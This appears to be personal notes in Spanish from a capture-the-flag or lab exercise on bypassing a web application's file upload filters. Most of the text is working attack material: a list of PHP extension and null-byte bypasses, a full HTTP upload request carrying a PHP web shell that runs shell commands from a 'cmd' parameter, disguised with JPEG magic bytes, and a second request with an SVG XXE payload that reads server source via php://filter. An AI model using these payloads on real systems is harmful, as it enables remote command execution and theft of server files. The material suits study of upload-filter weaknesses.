Extensiones de php validas (no se si ejecutan codigo):
.pht
.phtm
.php\x00.gif
.php\x00.png
.php\x00.jpg
.phar
.pgif


El payload que me permite subir la webshell tiene como nombre simple-backdoor.phar.png que pasa tanto la whitelist como la blacklist.
Tambien tiene que pasar el filtro de contenido por lo que añado al principio del archivo los magic bytes de los archivos jpg: \xff\xd8\xff porque GIF8 no funciona.

POST /contact/upload.php HTTP/1.1
Host: 83.136.253.249:44260
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21393057312337294732484329995
Content-Length: 647
Origin: http://83.136.253.249:44260
Connection: keep-alive
Referer: http://83.136.253.249:44260/contact/

-----------------------------21393057312337294732484329995
Content-Disposition: form-data; name="uploadFile"; filename="simple-backdoor.phar.jpg"
Content-Type: image/jpg

ÿØÿ                                                                            
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

-----------------------------21393057312337294732484329995--



Ahora el problema es que no se a donde se sube el archivo por lo que no puedo interactuar con el por lo que hay que hacer un ataque XXE, pruebo  escribir un archivo con el siguiente payload:
payload.svg.jpg que pasa todos los filtros sin necesidad de añadir magic bytes

La request:

POST /contact/upload.php HTTP/1.1
Host: 83.136.253.249:44260
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21393057312337294732484329995
Content-Length: 358
Origin: http://83.136.253.249:44260
Connection: keep-alive
Referer: http://83.136.253.249:44260/contact/

-----------------------------21393057312337294732484329995
Content-Disposition: form-data; name="uploadFile"; filename="payload.svg.jpg"
Content-Type: image/jpg

ding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

-----------------------------21393057312337294732484329995--

Por ultimo revisando el codigo obtenido podemos descifrar donde se guarda el archivo y con que nombre se guarda.
